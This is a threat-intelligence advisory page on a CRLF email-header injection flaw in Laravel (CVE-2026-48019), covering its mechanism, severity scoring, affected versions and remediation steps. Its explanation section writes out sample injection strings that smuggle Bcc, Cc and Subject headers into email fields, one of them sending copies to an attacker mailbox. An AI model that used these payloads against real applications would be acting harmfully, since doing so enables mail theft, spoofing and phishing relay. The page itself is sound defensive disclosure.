Laravel Framework CRLF Injection (CVE-2026-48019) — Outbound Email Header/Content Manipulation (CWE-93)

Laravel Framework CRLF Injection (CVE-2026-48019) (TL-2026-0677), also tracked as GHSA-5vg9-5847-vvmq, is a high-severity software vulnerability scored CVSS 8.9, first published 2026-06-03. It has no confirmed attribution, affects Laravel Laravel Framework, references 1 CVE (CVE-2026-48019), maps to 8 MITRE ATT&CK techniques (T1048, T1071, T1114), and is covered by 9 detection rules and 12 indicators of compromise.

Key facts for TL-2026-0677

Threat ID
TL-2026-0677
Also known as
GHSA-5vg9-5847-vvmq, Laravel CRLF Email Injection
Severity
HIGH
CVSS
8.9 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L)
Status
ACTIVE
Category
VULNERABILITY
First published
2026-06-03
Last reviewed
2026-06-03
Attribution confidence
NONE
Motivation
UNKNOWN
Target sectors
technology, saas, ecommerce, financial, healthcare, government, media
Target regions
Global
Detection rules
9
Indicators of compromise
12

Improper neutralization of CRLF sequences in Laravel's default email validation logic allows an unauthenticated attacker to inject additional recipients and headers, modify message bodies, and abuse the application's mail relay when attacker-controlled email input reaches Symfony Mailer/Mime. Patched in Laravel 13.10.0 and 12.60.0.

How Laravel Framework CRLF Injection (CVE-2026-48019) works

CVE-2026-48019 is a CRLF (carriage-return/line-feed) injection vulnerability (CWE-93) in the Laravel PHP framework's default email validation logic. User-supplied email address values submitted through common application surfaces — registration, password reset, contact, newsletter, and notification flows — are insufficiently sanitized for embedded carriage-return (\r, %0d) and line-feed (\n, %0a) control characters before they are passed to the underlying Symfony Mailer and Symfony Mime components that Laravel uses for message construction and delivery.

Because email headers are newline-delimited, an attacker who embeds CRLF sequences into an address field can break out of the intended field boundary and append arbitrary additional headers or message content. Representative payloads such as 'victim@example.com\r\nBcc: attacker@evil.com' or 'victim@example.com%0d%0aCc: list@target.com%0d%0aSubject: Spoofed' cause the mail layer to emit additional recipients (Bcc/Cc), spoofed or duplicated headers (Reply-To, Content-Type, MIME boundaries), and in some configurations attacker-controlled body content. The practical impact set is: (1) silent recipient injection enabling exfiltration of outbound mail to an attacker mailbox, (2) header manipulation enabling sender/Reply-To spoofing and routing changes, (3) body/MIME manipulation, and (4) mail-relay abuse in which the victim application's trusted, authenticated, well-reputed mail infrastructure is leveraged to send phishing or spam that inherits the victim domain's SPF/DKIM/DMARC alignment.

The vulnerability is network-exploitable with no authentication and no user interaction. The assigned CVSS v3.1 vector (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L, base 8.9 HIGH) reflects a scope change — the flaw in the web application crosses a trust boundary into the separate mail-delivery system and its downstream recipients — with high confidentiality and integrity impact and low availability impact. Attack complexity is rated High because successful injection depends on the specific application code path that forwards the unsanitized address into the mail builder and on the absence of upstream input filtering.

The issue was disclosed via GitHub Security Advisory GHSA-5vg9-5847-vvmq and credited to researcher OmarXtream. It affects Laravel up to 13.9.0 and all versions before 12.60.0, and is fixed in 13.10.0 and 12.60.0, which tighten neutralization of control characters in the email validation/normalization path before values reach Symfony Mailer/Mime. At the time of analysis there is no confirmed public proof-of-concept and no observed in-the-wild exploitation; however, CRLF/email-header injection is a well-understood, low-tooling class and the affected framework is extremely widely deployed, so defenders should treat exposed unpatched instances as readily exploitable. There are no network C2 indicators associated with this vulnerability; detection focuses on outbound-mail anomalies and inbound payload patterns.

MITRE ATT&CK techniques used in TL-2026-0677

Exfiltration

T1048 Exfiltration Over Alternative Protocol

Command and Control

T1071 Application Layer Protocol

Collection

T1114 Email Collection

Initial Access

T1190 Exploit Public-Facing Application; T1566 Phishing; T1659 Content Injection

Resource Development

T1583 Acquire Infrastructure

Defense Evasion

T1684.001 Impersonation

Affected products and versions in Laravel Framework CRLF Injection (CVE-2026-48019)

  • Laravel — Laravel Framework
    Vulnerable versions: <= 13.9.0; < 12.60.0
    Fixed in: 13.10.0; 12.60.0
  • Symfony — Symfony Mailer / Symfony Mime
    Vulnerable versions: used by affected Laravel mail path
    Fixed in: mitigated via Laravel validation fix

Remediation for Laravel Framework CRLF Injection (CVE-2026-48019)

Patches

  • Laravel framework 13.10.0
  • Laravel framework 12.60.0

Immediate actions

  • Upgrade Laravel to 13.10.0 (13.x branch) or 12.60.0 (12.x branch) or later immediately
  • Reject any user-supplied email field containing CR (\r / %0d), LF (\n / %0a), or other control characters at the application input boundary
  • Audit recent outbound mail logs for unexpected Bcc/Cc recipients, duplicated headers, or anomalous Reply-To/Subject values

Workarounds

  • Apply a global input filter / FormRequest rule stripping or rejecting CRLF in email inputs until upgrade is possible
  • Disable or gate unauthenticated mail-triggering endpoints (contact/newsletter) pending patch

Longer-term hardening

  • Enforce strict RFC-compliant email validation (single address, no control characters) on all mail-bearing input across the codebase
  • Constrain the application's SMTP relay to expected recipient volumes and domains; alert on outbound spikes
  • Harden SPF/DKIM/DMARC and monitor for abuse of the sending domain's reputation
  • Add WAF rules blocking %0d/%0a and raw CRLF in parameters that map to email fields

CVEs associated with Laravel Framework CRLF Injection (CVE-2026-48019)

CVE-2026-48019

Weaknesses (CWE) in Laravel Framework CRLF Injection (CVE-2026-48019)

CWE-93

Timeline of Laravel Framework CRLF Injection (CVE-2026-48019)

  • Laravel framework releases 13.10.0 and 12.60.0 published with the fix tightening neutralization of CRLF/control characters in the email validation path.
  • GitHub Security Advisory GHSA-5vg9-5847-vvmq published disclosing the Laravel CRLF email injection vulnerability, credited to researcher OmarXtream.
  • Researcher completed deep analysis: exploit-chain mapping (recipient/header/body injection, relay abuse), MITRE mapping, and IOC/detection scoping.
  • Threat ingested into Threadlinqs Intelligence pipeline (TL-2026-0677); no confirmed public PoC or in-the-wild exploitation at intake.
  • Public technical reporting by Cyber Security News, GBHackers, and Cyberpress describing header/recipient injection and mail-relay abuse impact.
  • CVE-2026-48019 referenced for the vulnerability with CVSS v3.1 vector AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L (base 8.9, HIGH).

Sources cited for Laravel Framework CRLF Injection (CVE-2026-48019)

Threats related to Laravel Framework CRLF Injection (CVE-2026-48019)

Detection coverage for TL-2026-0677

As of 2026-06-03, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0677 across Splunk SPL, Microsoft KQL and Sigma, covering 12 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat weather, live.

Every square is one real report, mapped to MITRE ATT&CK and shipped with Splunk SPL, Microsoft KQL and Sigma detections you can copy.

Every threat in the corpus, newest first.

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats